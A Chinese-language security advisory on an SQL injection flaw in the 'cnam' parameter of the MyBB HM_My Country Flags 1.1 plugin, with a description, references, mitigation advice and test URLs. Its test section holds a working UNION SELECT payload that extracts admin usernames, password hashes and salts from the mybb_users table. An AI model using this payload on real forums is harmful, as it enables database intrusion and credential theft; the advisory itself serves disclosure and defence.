MyBB HM_My Country Flags 插件'cnam'参数SQL注入漏洞
MyBB HM_My Country Flags 插件'cnam'参数SQL注入漏洞
发布日期:2012-12-24
更新日期:2012-12-28
受影响系统:
MyBB HM_My Country Flags 1.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57056
HM_My Country Flags插件可允许在postbit内显示国旗,并根据国籍显示用户列表。
HM_My Country Flags插件1.1版本的inc/plugins/hmflags.php没有正确验证misc.php内的"cnam"参数值的合法性,即被用在SQL查询中,通过注入任意SQL代码,可被利用操作数据库。
<*来源:JoinSe7en
链接:http://www.exploit-db.com/exploits/23624/
http://secunia.com/advisories/51644/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/forum/misc.php?action=hmflags&amp;cnam=Belgium'&amp;pf=5
http://www.example.com/forum/misc.php?action=hmflags&amp;cnam=-Belgium'+UNION SELECT 1,group_concat(username,0x3a,password,0x3a,salt,0x3b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164+FROM+mybb_users WHERE uid=1--+&amp;pf=5
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 禁用HM_My Country Flags 插件
厂商补丁:
MyBB
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://mods.mybb.com/view/hm-my-country-flags
评论暂时关闭